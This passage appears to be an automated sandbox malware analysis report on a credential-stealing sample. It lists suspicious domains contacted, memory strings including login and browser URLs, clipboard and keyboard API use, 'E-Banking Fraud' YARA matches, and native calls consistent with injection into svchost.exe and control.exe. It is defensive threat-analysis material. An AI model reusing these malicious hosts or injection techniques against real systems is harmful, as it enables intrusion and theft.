c1 59 af 52 71 a6 f4 96 11 44 fd 39 ec 92 a4 0c cb 60 63 96 fc 9b c5 95 da 79 4c 93 8d ee 79 4a 19 8b 96 a5 a8 26 66 44 b0 4f 24 ca 96 d8 7b 0c a5 48 b9 6f 16 73 b8 2f 83 e2 f3 82 c6 89 90 1a 73 3d 7d aa 4a 0a 4b 22 8c b2 2a d1 b9 cf ff 9e 4b 44 f9 9e a6 a2 1f 88 8b 06 36 4a 36 53 b4 cb f1 49 b9 03 98 fe 04 10 35 20 1e 65 d7 40 9d 11 60 ee 92 02 21 74 f3 4a d5 a4 a8 0e 9c b3 98 53 b4 98 31 ca 1f 91 24 0c 48 84 a7 c0 be 81 22 49 82 b9 11 69 9d 28 b7 d7 cb 1b 2a 2b 14 22 64 04 27 54 59 9e 88 73 32 bf 0e 70 4c d9 76 fe 3d 66 64 8d b7 af 06 df 0c 6d fb 55 ff db 51 f1 1c db b6 81 b0 9a 1b 01 01 fd 0c e4 49 a1 94 90 34 a4 7c 6e 60 2e f8 36 16 29 08 52 eb ef 73 65 c2 0c 55 41 e3 10 4a 63 4d bd 7c 02 90 f2 78 74 4f 70 4e 3c 7d Data Ascii: -!ZMXZ{|Qs@v%2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 04:24:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 15116Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 ed 96 e3 c6 b1 2d f8 bb b8 96 de 21 1b bd 5a 4d ca 04 08 f0 ab 58 e0 87 5a 96 ed 7b 7c d7 b1 e5 51 cb 73 ae 97 a4 e9 95 04 12 40 76 25 32 e1 cc 04 3f 1a ae 07 9a d7 98 27 9b c0 07 49 90 04 8b 54 77 cb 77 66 1d b1 8a 20 32 32 62 47 c4 de fb 6e f6 e2 0f df 7d fb c3 3f fe f6 47 14 e9 98 2d 5a 77 b3 fc 17 31 cc c3 b9 41 b8 f9 f7 b7 46 11 24 d8 87 df bb 59 4c 34 46 5e 84 a5 22 7a 6e fc fd 87 3f 99 13 03 f5 0e 57 1c c7 64 6e ac 28 59 27 42 6a 03 79 82 6b c2 21 75 4d 7d 1d cd 7d b2 a2 1e 31 8b 43 17 51 4e 35 c5 cc 54 1e 66 64 ee 18 05 0c a3 fc 11 49 c2 e6 46 22 45 40 19 31 50 24 49 30 37 22 ad 13 e5 f6 7a 61 9c 84 96 90 61 6f 13 f0 9e 53 55 69 aa 19 59 fc 0d 87 04 71 a1 51 20 52 ee a3 2f 5f 4e fa 8e 33 45 7f d9 a2 df 33 11 ce 7a 65 56 ab 36 ea 6b 29 96 42 ab d7 fb 41 5f c7 78 63 d2 18 80 cc 44 92 7c 11 97 61 19 92 d7 f9 96 87 e1 5e fb 5c e5 09 01 d1 5e f4 ba 9c f0 75 af 97 e0 04 c7 09 66 8c 5a 2a 12 c9 49 91 81 99 26 92 63 0d 3b e9 6d 02 44 e1 24 61 d4 c3 9a 0a de 93 4a fd 6e 13 33 b8 ca a7 9c 1b d5 d4 e8 4b 89 ff 99 8a 29 fa 13 21 fe 29 17 27 fd 7a 01 e4 f4 8c cf d9 f5 5b 11 c7 c0 8b ba a9 bd 57 25 d7 e7 50 9e a4 89 5e b4 56 58 a2 04 68 65 78 4b e4 3b fc 1e 6f 52 c9 d0 1c 5d 04 5b 27 26 f6 63 ca 7b c5 d3 cc 2b ac 24 4a be 36 a6 27 58 21 13 4b cc de 71 c1 3d 92 03 2e 87 d8 1f 3e 8c c9 72 79 96 aa 88 5c c1 8f a6 71 9e e9 dc 0f ec c9 f8 de 9e 0c 4e f3 a8 7a c7 e8 aa 40 3b c3 08 b0 47 96 42 3c be a3 7e e3 bd 22 5a 53 1e 2a b8 cc 8c 44 28 fd 2e 67 5d 19 ee 8f c5 c9 e8 1a 79 ae f1 73 d7 20 1c 2f 19 79 17 42 27 69 b8 01 66 8a 74 0d f0 df bb 35 f5 75 64 b8 8e 73 6f 77 0d 9d 27 e9 77 4b 49 f0 63 22 28 d7 86 7b 3f 9e 40 a2 58 52 a8 ae c7 47 36 e4 2b ea 93 25 3e 00 2e 85 bf 7d 17 88 fc be 8a 78 82 89 dd fd d3 e9 f8 92 78 38 01 53 bf 63 98 87 d5 82 b3 5e a5 e2 4c e9 2d 23 88 fa 73 d8 25 49 19 96 c1 c6 2c f9 37 8b 2b b5 f3 98 26 1b dd f3 94 32 16 2d 4b 51 4d cc 88 60 9f 48 94 2d b1 f7 18 4a 91 72 df 2c e6 70 5f 06 c5 e7 05 8d 13 21 35 e6 7a fa 54 95 14 96 44 18 65 55 a2 73 9f ff 3d 97 88 f2 3d 4d 45 3f 10 17 0d 6c 94 6c a6 68 97 e3 93 72 07 30 fd 09 20 6a 40 3c ca ae 81 3a 23 c0 dc 25 05 42 e8 e6 95 aa 49 51 1d 38 67 31 a7 68 31 63 94 3f 22 49 18 90 08 4f 81 7d 03 45 92 04 73 23 d2 3a 51 6e af 97 37 54 56 28 44 c8 08 4e a8 b2 3c 11 e7 64 7e 1d e0 98 b2 ed fc 7b cc c8 1a 6f 5f 0d be 19 da f6 ab fe b7 a3 e2 39 b6 6d 03 61 35 37 02 02 fa 19 c8 93 42 29 21 69 48 f9 dc c0 5c f0 6d 2c 52 10 a4 d6 df e7 ca 84 19 aa 82 c6 21 94 c6 9a 7a f9 04 20 e5 f1 e8 9e e0 9c 78 fa Data Ascii: -!ZMXZ{|Qs@v%2
                Source: control.exe, 00000007.00000002.4589404879.0000000006C3E000.00000004.10000000.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004A6E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://papampalli.shop/m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7X
                Source: control.exe, 00000007.00000002.4589404879.0000000006788000.00000004.10000000.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.seraph.best/
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4590001024.00000000056E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yourwebbuzz.net
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4590001024.00000000056E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yourwebbuzz.net/84o5/
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: control.exe, 00000007.00000003.2684882870.0000000007FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033q
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: control.exe, 00000007.00000002.4579928297.0000000002FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/--lyublyu-----67-letnyaya-dolina-publichno-priznalas-v-chuvstvah-z
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/--polnoe-obezdvizhivanie----vrach-rasscazal--chto-proishodit-s-per
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/--zanovo----lolita-zagovorila-o-vozvrashchenii-c-tsecalo/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/budet-ili-net-dopolnitelnaya-pensiya--pensioneram-razyasnili-situa
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/chistaya-eczotica--civi-uluchshaet--ucreplyaet--raduet/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/endocrinolog-nazvala-sposobi-uluchsheniya-potentsii/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/endocrinolog-rasscazala-ob-antivozrastnoy-yagode-dlya-pozhilih/?ke
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/giteley-kamchatci-oscorbili-slova-yacubovicha-v-efire---pole-chude
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/gotovitsya-za-minutu--a-hvalyat-ves-vecher--cac-prigotovit-shicarn
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kac-bolit-golova-pri-raznih-zabolevaniyah/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kac-pomoch-dozret-fructam-i-ovoshcham-v-domashnih-usloviyah/?keywo
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kac-prigotovit---copeechniy---sup--retsept--cotoriy-ostalsya-s-sov
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kac-sdelat-zapechennie-ovoshchi-v-tri-raza-vcusnee/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kac-svarit-i-podat-c-stolu-pelmeni-v-bulone--retsept--cac-v-restor
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/kogda-solit-varenuyu-cartoshcu/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/meriya-zavershila-provercu-v-ryazanscoy-shcole-------62-posle-scan
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/myaso-budet-tayat-vo-rtu--vot-chto-opitnie-culinari-dobavlyayut-v-
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/na-rublevce-delyat-nasledstvo-churicovoy--na-usadbu-uzhe-nashelsya
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/nazvani-polza-i-vred-gorcogo-shocolada/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/noviy-podhod-pomozhet-bolee-effectivno-borotsya-s-racom/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/pensii-pereschitayut--budet-drugoy-razmer-rabotayushchim-pensioner
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/pensionerov--u-cotorih-est-stazh-20-let--zhdet-bolshoy-syurpriz/?k
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/pochemu-colichestvo-sahara-nuzhno-socratit/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/pochemu-nelzya-varit-zamorozhennoe-myaso--blyudo-budet-beznadezhno
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/portit-zhizn-blizcim-i-collegam--obnarodovana-otvratitelnaya-privi
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/razvarivaetsya-vermishel-v-supe--cacaya-hitrost-pomozhet-ispravit-
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/ridala-pryamo-na-stsene--v-seme-semenovich-strashnoe-gore/?keyword
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/slegshemu-drobotenco-vizvali-vrachey-posredi-nochi--chto-sluchilos
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/spetsialisti-obyasnili-nepotrebnoe-povedenie-anastasii-volochcovoy
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/v-bashcirii-prostilis-s-pervim-prezidentom-respublici-murtazoy-rah
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/v-minfine-rasscazali-pensioneram-ob-ih-unicalnom-prave/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/v-moscve-16-letniy-podrostoc-umer-ot-redcoy-formi-bessonnitsi/?key
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/v-moscve-nashli-mumifitsirovannoe-telo-zvezdi---papinih-dochec---i
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/v-pravitelstve-viscazalis-o-vvedenii-novogo-vihodnogo-dnya-v-rossi
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/vot-chto-budet-s-vashim-organizmom--esli-ne-pit-alcogol-1-mesyats/
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/vot-chto-vam-nuzhno-pit-ot-vseh-virusov-i-bolezney/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/yaponsciy-hudozhnic-sozdaet-stseni-v-miniatyure-iz-edi/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/yurist-predupredila-rossiyan-o-risce-poteryat-imushchestvo/?keywor
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/yurist-rasscazal-o-sposobe-poluchat-dve-pensii/?keyword=
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4584541211.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.jivatop.online/lander/zametno-po-rucam--vrach-nazvala-dva-neozhidannih-priznaca-tsirroza
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513521514.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4579324178.0000000000B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4582371287.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C583 NtClose,2_2_0042C583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,2_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E34650 NtSuspendThread,LdrInitializeThunk,7_2_04E34650
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E34340 NtSetContextThread,LdrInitializeThunk,7_2_04E34340
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04E32CA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32C60 NtCreateKey,LdrInitializeThunk,7_2_04E32C60
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04E32C70
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04E32DF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32DD0 NtDelayExecution,LdrInitializeThunk,7_2_04E32DD0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04E32D30
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04E32D10
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04E32EE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04E32E80
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32FE0 NtCreateFile,LdrInitializeThunk,7_2_04E32FE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32FB0 NtResumeThread,LdrInitializeThunk,7_2_04E32FB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32F30 NtCreateSection,LdrInitializeThunk,7_2_04E32F30
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32AF0 NtWriteFile,LdrInitializeThunk,7_2_04E32AF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32AD0 NtReadFile,LdrInitializeThunk,7_2_04E32AD0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04E32BE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04E32BF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04E32BA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32B60 NtClose,LdrInitializeThunk,7_2_04E32B60
